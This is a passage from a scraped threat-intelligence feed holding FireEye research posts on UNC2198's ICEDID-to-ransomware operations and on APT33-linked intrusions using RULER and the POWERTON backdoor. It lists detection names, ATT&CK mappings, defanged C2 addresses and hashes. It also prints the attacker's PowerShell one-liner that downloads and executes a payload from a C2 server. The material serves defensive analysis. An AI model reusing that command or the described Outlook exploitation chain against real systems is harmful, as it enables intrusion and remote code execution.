non-malicious domains. 
The non-malicious domains are contacted in addition to the real C2.\n\n[WINDARC](<https://advantage.mandiant.com/malware/malware--5f584191-7903-55f9-8a3d-c1b4528e18be>) is a backdoor that hijacks the execution of TeamViewer to perform C2 communication. It supports plugins and accepts several backdoor commands. The commands include interacting with the TeamViewer tool, starting a reverse shell, loading new plugins, downloading and executing files, and modifying configuration settings.\n\n[SYSTEMBC](<https://advantage.mandiant.com/malware/malware--17784955-af55-5462-877f-feaba0c8d80a>) is a proxy malware that beacons to its C2 and opens new proxy connections between the C2 and remote hosts as indicated by the C2. Proxied communications are encrypted with RC4. The malware receives commands via HTTP and creates new proxy connections as directed. Underground sales advertisements refer to the software as a \u201c_socks5 backconnect system_\u201d. The malware is typically used to hide the malicious traffic associated with other malware.\n\n#### Appendix: Detecting the Techniques\n\nFireEye security solutions detect these threats across email, endpoint, and network levels. 
The following is a snapshot of existing detections related to activity outlined in this blog post.\n\n**FireEye Network Security**\n\n * Downloader.Macro.MOUSEISLAND\n * Downloader.Win.PHOTOLOADER\n * Trojan.PHOTOLOADER\n * Downloader.IcedID\n * Trojan.IcedID\n * Malicious.SSL.IcedID\n * Malicious.SSL.IcedIdCert\n * Trojan.Malicious.Certificate\n * Backdoor.BEACON\n * Trojan.Generic\n * Trojan.CobaltStrike\n\n**FireEye Endpoint Security, Real-Time (IOC)**\n\n * BLOODHOUND ATTACK PATH MAPPING (UTILITY)\n * BLOODHOUND ATTACK PATH MAPPING A (UTILITY)\n * COBALT STRIKE (BACKDOOR)\n * COBALT STRIKE DEFAULT DLL EXPORT (BACKDOOR)\n * COBALT STRIKE NAMED PIPE ECHO (BACKDOOR)\n * EGREGOR RANSOMWARE (FAMILY)\n * ICEDID (FAMILY)\n * MAZE RANSOMWARE (FAMILY)\n * MAZE RANSOMWARE A (FAMILY)\n * METASPLOIT SERVICE ABUSE (UTILITY)\n * MOUSEISLAND (DOWNLOADER)\n * MOUSEISLAND A (DOWNLOADER)\n * MOUSEISLAND B (DOWNLOADER)\n * POWERSHELL DOWNLOADER (METHODOLOGY)\n * POWERSHELL DOWNLOADER D (METHODOLOGY)\n * SCHTASK CREATION FROM PROGRAMDATA (COLLECTION)\n * SUSPICIOUS BITSADMIN USAGE A (METHODOLOGY)\n * SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\n * WMIC SHADOWCOPY DELETE (METHODOLOGY)\n\n**FireEye Endpoint Security, Malware Protection (AV/MG)**\n\n * SYSTEMBC\n   * Trojan.EmotetU.Gen.*\n   * Trojan.Mint.Zamg.O\n   * Generic.mg.*\n * ICEID\n   * Gen:Variant.Razy.*\n   * Generic.mg.*\n * BEACON\n   * Gen:Trojan.Heur.TP.TGW@bug909di\n   * Gen:Variant.Bulz.1217\n   * Trojan.GenericKD.34797730\n   * Generic.mg.*\n\n#### Appendix: Indicators\n\n#### Appendix: Mandiant Security Validation Actions\n\nOrganizations can validate their security controls against more than 60 actions with Mandiant Security Validation.\n\n**VID** | **Name**\n---|---\nA101-509 | Phishing Email - Malicious Attachment, MOUSEISLAND, Macro Based Downloader\nA150-326 | Malicious File Transfer - MOUSEISLAND, Download, Variant #1\nA150-433 | Malicious File Transfer - MOUSEISLAND, Download, Variant #2\nA101-282 | Malicious File Transfer - MOUSEISLAND Downloader, Download\nA104-632 | Protected Theater - MOUSEISLAND Downloader, Execution\nA101-266 | Command and Control - MOUSEISLAND, HTTP GET Request for PHOTOLOADER\nA101-280 | Malicious File Transfer - PHOTOLOADER, Download\nA101-263 | Command and Control - PHOTOLOADER, DNS Query #1
A101-281 | Malicious File Transfer - ICEDID Stage 3, Download\nA101-279 | Malicious File Transfer - ICEDID Final Payload, Download\nA101-265 | Command and Control - ICEDID, DNS Query #1\nA101-264 | Command and Control - ICEDID, DNS Query #2\nA101-037 | Malicious File Transfer - MAZE, Download, Variant #1\nA101-038 | Malicious File Transfer - MAZE, Download, Variant #2\nA101-039 | Malicious File Transfer - MAZE, Download, Variant #3\nA101-040 | Malicious File Transfer - MAZE, Download, Variant #4\nA101-041 | Malicious File Transfer - MAZE, Download, Variant #5\nA101-042 | Malicious File Transfer - MAZE, Download, Variant #6\nA101-043 | Malicious File Transfer - MAZE, Download, Variant #7\nA101-044 | Malicious File Transfer - MAZE, Download, Variant #8\nA101-045 | Malicious File Transfer - MAZE, Download, Variant #9\nA100-878 | Command and Control - MAZE Ransomware, C2 Check-in\nA101-030 | Command and Control - MAZE Ransomware, C2 Beacon, Variant #1\nA101-031 | Command and Control - MAZE Ransomware, C2 Beacon, Variant #2\nA101-032 | Command and Control - MAZE Ransomware, C2 Beacon, Variant #3\nA104-734 | Protected Theater - MAZE, PsExec Execution\nA104-487 | Protected Theater - MAZE Ransomware, Encoded PowerShell Execution\nA104-485 | Protected Theater - MAZE Ransomware Execution, Variant #1\nA104-486 | Protected Theater - MAZE Ransomware Execution, Variant #2\nA104-491 | Host CLI - MAZE, Create Target.lnk\nA104-494 | Host CLI - MAZE, Dropping Ransomware Note Burn Directory\nA104-495 | Host CLI - MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant\nA104-496 | Host CLI - MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant
A104-498 | Host CLI - MAZE, Desktop Wallpaper Ransomware Message\nA150-668 | Malicious File Transfer - EGREGOR, Download\nA101-460 | Command and Control - EGREGOR, GET DLL Payload\nA150-675 | Protected Theater - EGREGOR, Execution, Variant #1\nA101-271 | Malicious File Transfer - BEACON, Download, Variant #1\nA150-610 | Malicious File Transfer - BEACON, Download\nA150-609 | Command and Control - BEACON, Check-in\nA104-732 | Protected Theater - BEACON, Mixed Unicode-Escaped and ASCII Characters Execution\nA101-514 | Malicious File Transfer - WINDARC, Download, Variant #1\nA100-072 | Malicious File Transfer - SYSTEMBC Proxy, Download\nA100-886 | Malicious File Transfer - Rclone.exe, Download\nA100-880 | Malicious File Transfer - Bloodhound Ingestor C Sharp Executable Variant, Download\nA100-881 | Malicious File Transfer - Bloodhound Ingestor C Sharp PowerShell Variant, Download\nA100-882 | Malicious File Transfer - Bloodhound Ingestor PowerShell Variant, Download\nA100-877 | Active Directory - BloodHound, CollectionMethod All\nA101-513 | Malicious File Transfer - SOURBITS, Download, Variant #1\nA104-733 | Protected Theater - CVE-2020-0787, Arbitrary File Move\nA100-353 | Command and Control - KOADIC Agent (mshta)\nA100-355 | Command and Control - Multiband Communication using KOADIC\nA104-088 | Host CLI - Timestomp W/ PowerShell\nA104-277 | Host CLI - EICAR COM File Download via PowerShell\nA104-281 | Host CLI - EICAR TXT File Download via PowerShell\nA104-664 | Host CLI - EICAR, Download with PowerShell\nA150-054 | Malicious File Transfer - EMPIRE, Download\nA100-327 | Command and Control - PowerShell Empire Agent (http)\nA100-328 | Lateral Movement, Execution - PsExec\nA100-498 | Scanning Activity - TCP Port Scan for Open RDP\nA100-502 | Scanning Activity - UDP Port Scan for Open RDP\nA100-316 | Lateral Movement - PSSession and WinRM\nA104-081 | Host CLI - Mshta\n\n#### Appendix: UNC2198 MITRE ATT&CK Mapping\n\n**Resource Development**\n\n * Acquire Infrastructure (T1583)\n   * Virtual Private Server (T1583.003)\n * Develop Capabilities (T1587)\n   * Digital Certificates (T1587.003)\n * Obtain Capabilities (T1588)\n   * Code Signing Certificates (T1588.003)\n   * Digital Certificates (T1588.004)\n\n**Initial Access**\n\n * Phishing (T1566)\n   * Spearphishing Attachment (T1566.001)\n * External Remote Services (T1133)\n * Valid Accounts (T1078)\n\n**Execution**\n\n * Command and Scripting Interpreter (T1059)\n   * PowerShell (T1059.001)\n   * Visual Basic (T1059.005)\n   * Windows Command Shell (T1059.003)\n * Scheduled Task/Job (T1053)\n   * Scheduled Task (T1053.005)\n * System Services (T1569)\n   * Service Execution (T1569.002)\n * User Execution (T1204)\n   * Malicious File (T1204.002)\n * Windows Management Instrumentation (T1047)\n\n**Persistence**\n\n * External Remote Services (T1133)\n * Scheduled Task/Job (T1053)\n   * Scheduled Task (T1053.005)\n * Valid Accounts (T1078)\n\n**Privilege Escalation**\n\n * Process Injection (T1055)\n * Scheduled Task/Job (T1053)\n   * Scheduled Task (T1053.005)\n * Valid Accounts (T1078)\n\n**Defense Evasion**\n\n * Impair Defenses (T1562)\n   * Disable or Modify System Firewall (T1562.004)\n   * Disable or Modify Tools (T1562.001)\n * Indicator Removal on Host (T1070)\n   * Timestomp (T1070.006)\n * Indirect Command Execution (T1202)\n * Modify Registry (T1112)\n * Obfuscated Files or Information (T1027)\n   * Steganography (T1027.003)\n * Process Injection (T1055)\n * Signed Binary Proxy Execution (T1218)\n   * Mshta (T1218.005)\n * Subvert Trust Controls (T1553)\n   * Code Signing (T1553.002)\n * Valid Accounts (T1078)\n * Virtualization/Sandbox Evasion (T1497)\n\n**Credential Access**\n\n * OS Credential Dumping (T1003)\n\n**Discovery**\n\n * Account Discovery (T1087)\n   * Local Account (T1087.001)\n * Domain Trust Discovery (T1482)\n * File and Directory Discovery (T1083)\n * Permission Groups Discovery (T1069)\n * System Information Discovery (T1082)\n * System Network Configuration Discovery (T1016)\n * System Owner/User Discovery (T1033)\n * Virtualization/Sandbox Evasion (T1497)\n\n**Lateral Movement**\n\n * Remote Services (T1021)\n   * Remote Desktop Protocol (T1021.001)\n   * SMB/Windows Admin Shares (T1021.002)\n   * SSH (T1021.004)\n\n**Collection**\n\n * Archive Collected Data (T1560)\n   * Archive via Utility (T1560.001)\n\n**Command and Control**\n\n * Application Layer Protocol (T1071)\n   * Web Protocols (T1071.001)\n * Encrypted Channel (T1573)\n   * Asymmetric Cryptography (T1573.002)\n * Ingress Tool Transfer (T1105)\n * Proxy (T1090)\n   * Multi-hop Proxy (T1090.003)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T00:00:00", "type": "fireeye", "title": "So Unchill: Melting UNC2198 ICEDID to Ransomware Operations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": 
false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787"], "modified": "2021-02-25T00:00:00", "id": "FIREEYE:83F272F4DE8F766E35BD5943AAC47D20", "href": "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-01-27T23:01:52", "description": "#### Introduction\n\nFireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks. FireEye's [Managed Defense](<https://www.fireeye.com/solutions/managed-defense.html>) has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.\n\nOn Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity [targeting Energy and Aerospace industries](<https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html>). Recent public reporting indicated possible links between the confirmed APT33 spear phishing and [destructive SHAMOON attacks](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/>); however, we were unable to independently verify this claim. FireEye\u2019s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. 
We correlated the intrusions using an internally-developed similarity engine described below. Public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.\n\n> 45 days ago, during 24x7 monitoring, [#ManagedDefense](<https://twitter.com/hashtag/ManagedDefense?src=hash&ref_src=twsrc%5Etfw>) detected & contained an attempted intrusion from newly-identified adversary infrastructure*.\n>\n> It is C2 for a code family we track as POWERTON.\n>\n> *hxxps://103.236.149[.]100/api/info\n>\n> \u2014 FireEye (@FireEye) [December 15, 2018](<https://twitter.com/FireEye/status/1073744224510722048?ref_src=twsrc%5Etfw>)\n\n#### Identifying the Overlap in Threat Activity\n\nFireEye augments our expertise with an [internally-developed similarity engine](<https://www.camlis.org/matthew-berninger/>) to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps, including remarkable similarities in tool selection during specific timeframes. We assess with low confidence that the intrusions were conducted by APT33. 
This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is [available within our intelligence portal](<https://intelligence.fireeye.com/reports/18-00021316>). To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during their 24x7 monitoring.\n\n#### Managed Defense Rapid Responses: Investigating the Attacker\n\nIn mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost\u2019s [RULER](<https://github.com/sensepost/ruler>), to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\\outlook\\live.exe (MD5: _95f3bea43338addc1ad951cd2d42eb6f_).\n\nThe payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system\u2019s architecture, downloaded the appropriate variant of PowerSploit (MD5: _c326f156657d1c41a9c387415bf779d4_ or _0564706ec38d15e981f71eaf474d0ab8_), and reflectively loaded PUPYRAT (MD5: _94cd86a0a4d747472c2b3f1bc3279d77_ or _17587668AC577FCE0B278420B8EB72AC_). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, the publicly available Windows Sysinternals PROCDUMP to dump the LSASS process, and the publicly available MIMIKATZ, presumably to steal additional credentials. Managed Defense aided the victim in containing the intrusion.\n\nFireEye collected 168 PUPYRAT samples for a comparison. 
While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor\u2019s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one of which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.\n\nIn mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER\u2019s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users\u2019 Outlook client homepages for code execution and persistence. These methods are further explored in this post in the \"RULER In-The-Wild\" section.\n\nThe actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.\n\nDuring the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. 
One example is shown in Figure 1.\n\n \nFigure 1: Attacker\u2019s homepage exploit (CVE-2017-11774)\n\nThe main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the appropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named \u201cMedia.ps1\u201d within the user\u2019s %LOCALAPPDATA% directory (%LOCALAPPDATA%\\MediaWs\\Media.ps1) as shown in Figure 2.\n\n \nFigure 2: Attacker\u2019s \u201cMedia.ps1\u201d script\n\nThe purpose of \u201cMedia.ps1\u201d was to decode and execute the downloaded binary payload, which was written to disk as \u201cC:\\Users\\Public\\Downloads\\log.dat\u201d. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.\n\nAnalysis of the \u201clog.dat\u201d payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:\n\n * Username and domain\n * Computer name\n * CPU details\n * Current exe PID\n * Configured C2 server\n\nThe C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned \u201cMedia.ps1\u201d PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. 
During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.\n\nPOSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info). The adversary had limited success interacting with POWERTON during this time. The actor was able to download and establish persistence for an AutoIt binary named \u201cClouldPackage.exe\u201d (MD5: 46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON \u201cpersist\u201d command. The sole functionality of \u201cClouldPackage.exe\u201d was to execute the following line of PowerShell code:\n\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')\n\nThe purpose of this code is to retrieve \u201csilent mode\u201d POWERTON from the C2 server. Note that the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.\n\nStarting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They made some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection. The actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of \u201cindex.html\u201d were identified during this period. 
Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.\n\n \nFigure 3: OS-specific POSHC2 Downloader\n\nFigure 3 shows that the actor made some minor changes, such as encoding the PowerShell \"DownloadString\" commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to \u201cVision.ps1\u201d. During this August 2018 activity, the POSHC2 variants were configured with a \u201ckill date\u201d of Aug. 13, 2018. Note that POSHC2 supports a kill date to guardrail an intrusion by time; this functionality is built into the framework.\n\nOnce again, POSHC2 was used to download a new variant of POWERTON (MD5: _c38069d0bc79acdc28af3820c1123e53_), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.\n\nDue to Managed Defense\u2019s early containment of these intrusions, we were unable to ascertain the actor\u2019s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim\u2019s network.\n\n#### Adversary Pursuit: Infrastructure Monitoring\n\nAdvanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 
11, 2018, the adversary changed the payload (MD5: _8be06571e915ae3f76901d52068e3498_) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info (MD5: _4047e238bbcec147f8b97d849ef40ce5_). This specific URL was identified in a [public discussion](<https://twitter.com/KseProso/status/1073169197541281792>) as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.\n\nOn Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: _f0fe6e9dde998907af76d91ba8f68a05_). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: _53ae59ed03fa5df3bf738bc0775a91d9_).\n\nTable 1 contains the operational timeline for the activity we analyzed.\n\n**DATE/TIME (UTC)** | **NOTE** | **INDICATOR**\n---|---|---\n2017-08-15 17:06:59 | APT33 \u2013 EMPIRE (Used) | 8a99624d224ab3378598b9895660c890\n2017-09-15 16:49:59 | APT33 \u2013 PUPYRAT (Compiled) | 4b19bccc25750f49c2c1bb462509f84e\n2017-11-12 20:42:43 | GroupA \u2013 AUT2EXE Downloader (Compiled) | 95f3bea43338addc1ad951cd2d42eb6f\n2017-11-14 14:55:14 | GroupA \u2013 PUPYRAT (Used) | 17587668ac577fce0b278420b8eb72ac\n2018-01-09 19:15:16 | APT33 \u2013 PUPYRAT (Compiled) | 56f5891f065494fdbb2693cfc9bce9ae\n2018-02-13 13:35:06 | APT33 \u2013 PUPYRAT (Used) | 56f5891f065494fdbb2693cfc9bce9ae\n2018-05-09 18:28:43 | GroupB \u2013 AUT2EXE (Compiled) | 46038aa5b21b940099b0db413fa62687\n2018-07-02 07:57:40 | APT33 \u2013 POSHC2 (Used) | fa7790abe9ee40556fb3c5524388de0b\n2018-07-16 00:33:01 | GroupB \u2013 POSHC2 (Compiled) | 75e680d5fddbdb989812c7ba83e7c425\n2018-07-16 01:39:58 | GroupB \u2013 POSHC2 (Used) | 75e680d5fddbdb989812c7ba83e7c425\n2018-07-16 08:36:13 | GroupB \u2013 POWERTON (Used) | 46038aa5b21b940099b0db413fa62687\n2018-07-31 22:09:25 | APT33 \u2013 POSHC2 (Used) | 129c296c363b6d9da0102aa03878ca7f\n2018-08-06 16:27:05 | GroupB \u2013 POSHC2 (Compiled) | fca0ad319bf8e63431eb468603d50eff\n2018-08-07 05:10:05 | GroupB \u2013 POSHC2 (Used) | 75e680d5fddbdb989812c7ba83e7c425\n2018-08-29 18:14:18 | APT33 \u2013 POSHC2 (Used) | 5832f708fd860c88cbdc088acecec4ea\n2018-10-09 16:02:55 | APT33 \u2013 POSHC2 (Used) | 8d3fe1973183e1d3b0dbec31be8ee9dd\n2018-10-09 16:48:09 | APT33 \u2013 POSHC2 (Used) | 48d1ed9870ed40c224e50a11bf3523f8\n2018-10-11 21:29:22 | GroupB \u2013 POWERTON (Used) | 8be06571e915ae3f76901d52068e3498\n2018-12-13 11:00:00 | GroupB \u2013 POWERTON (Identified) | 99649d58c0d502b2dfada02124b1504c\n\nTable 1: Operational Timeline\n\n#### Outlook and Implications\n\nIf the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained proprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production.\n\nWe will continue to track these clusters independently until we achieve high confidence that they are the same. 
The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion activity every day across a wide spectrum of industries and adversaries. This daily front-line experience is backed by Advanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients every advantage they can have against sophisticated adversaries. We welcome additional original source information we can evaluate to confirm or refute our analytical judgements on attribution.\n\n#### Custom Backdoor: POWERTON\n\nPOWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including [WMI](<https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html>) and auto-run registry keys. Communications with the C2 are over TCP/HTTP(S) and leverage AES encryption for communication traffic to and from the C2. 
POWERTON typically gets deployed as a later stage backdoor and is obfuscated several layers.\n\nFireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and POWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump password hashes.\n\nTable 2 contains samples of POWERTON.\n\n**Hash of Obfuscated File (MD5)**\n\n| \n\n**Hash of Deobfuscated File (MD5)**\n\n| \n\n**Version** \n \n---|---|--- \n \n**974b999186ff434bee3ab6d61411731f**\n\n| \n\n3871aac486ba79215f2155f32d581dc2\n\n| \n\nV1 \n \n**e2d60bb6e3e67591e13b6a8178d89736**\n\n| \n\n2cd286711151efb61a15e2e11736d7d2\n\n| \n\nV1 \n \n**bd80fcf5e70a0677ba94b3f7c011440e**\n\n| \n\n5a66480e100d4f14e12fceb60e91371d\n\n| \n\nV1 \n \n**4047e238bbcec147f8b97d849ef40ce5**\n\n| \n\nf5ac89d406e698e169ba34fea59a780e\n\n| \n\nV2 \n \n**c38069d0bc79acdc28af3820c1123e53**\n\n| \n\n4aca006b9afe85b1f11314b39ee270f7\n\n| \n\nV2 \n \n**N/A**\n\n| \n\n7f4f7e307a11f121d8659ca98bc8ba56\n\n| \n\nV2 \n \n**53ae59ed03fa5df3bf738bc0775a91d9**\n\n| \n\n99649d58c0d502b2dfada02124b1504c\n\n| \n\nV2 \n \nTable 2: POWERTON malware samples\n\n#### Adversary Methods: Email Exploitation on the Rise\n\nOutlook and Exchange are ubiquitous with the concept of email access. User convenience is a primary driver behind technological advancements, but convenient access for users often reveals additional attack surface for adversaries. As organizations expose any email server access to the public internet for its users, those systems become intrusion vectors. 
FireEye has observed an increase in [targeted adversaries challenging and subverting security controls on Exchange and Office365.](<https://summit.fireeye.com/content/fireeye-summit/en_US/learn/tracks.html#technical-3>) Our Mandiant consultants also presented [several new methods used by adversaries to subvert multifactor authentication](<https://summit.fireeye.com/learn/tracks.html#technical-8>) at FireEye Cyber Defense Summit 2018.\n\nAt FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector is as follows.\n\nAn adversary has a single pair of valid credentials for a user within your organization obtained through any means, to include the following non-exhaustive examples:\n\n * Third party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for email addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a personal email address with a first and last name--and an affiliated password--compromised in a third-party breach somewhere. 
Did they re-use that password?\n * Previous compromise within your organization where credentials were compromised but not identified or reset.\n * Poor password choice or password security policies resulting in brute-forced credentials.\n * Gathering of crackable password hashes from various other sources, such as NTLM hashes gathered via [documents](<https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/>) intended to phish them from users.\n * Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet.\n\nOnce the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365 that is not protected with multi-factor authentication. The adversary leverages the stolen credentials and a tool like RULER to deliver exploits through Exchange\u2019s legitimate features.\n\n#### RULER In-The-Wild: Here, There, and Everywhere\n\nSensePost\u2019s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface (MAPI), or via remote procedure calls (RPC), both over HTTP protocol. As detailed in the \"Managed Defense Rapid Responses\" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email client process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an adversary-controlled IP address 85.206.161[.]214. 
This communication retrieved an executable created with _Aut2Exe_ (MD5: _95f3bea43338addc1ad951cd2d42eb6f)_, and executed a PowerShell one-liner to retrieve further malicious content.\n\nWithout the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious mail rule created using the aforementioned tooling for the following reasons:\n\n * Outlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is unexpected unless some feature of Outlook directly was exploited; traditional vectors like phishing would show a process ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process injection would imply prior malicious code execution on the host, which evidence did not support.\n * The transfer of _95f3bea43338addc1ad951cd2d42eb6f_ was over WebDAV. RULER facilitates this by exposing a simple WebDAV server, and a command line module for creating a client-side mail rule to point at that [WebDAV hosted payload](<https://github.com/sensepost/ruler/wiki/Rules#webdav>).\n * The choice of WebDAV for this initial transfer of stager is the result of restrictions in mail rule creation; the payload must be \"locally\" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or FTP are not permitted. This is thoroughly detailed in Silent Break Security's [initial write-up](<https://silentbreaksecurity.com/malicious-outlook-rules/>) prior to RULER\u2019s creation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring your malicious payload via an Outlook Rule. 
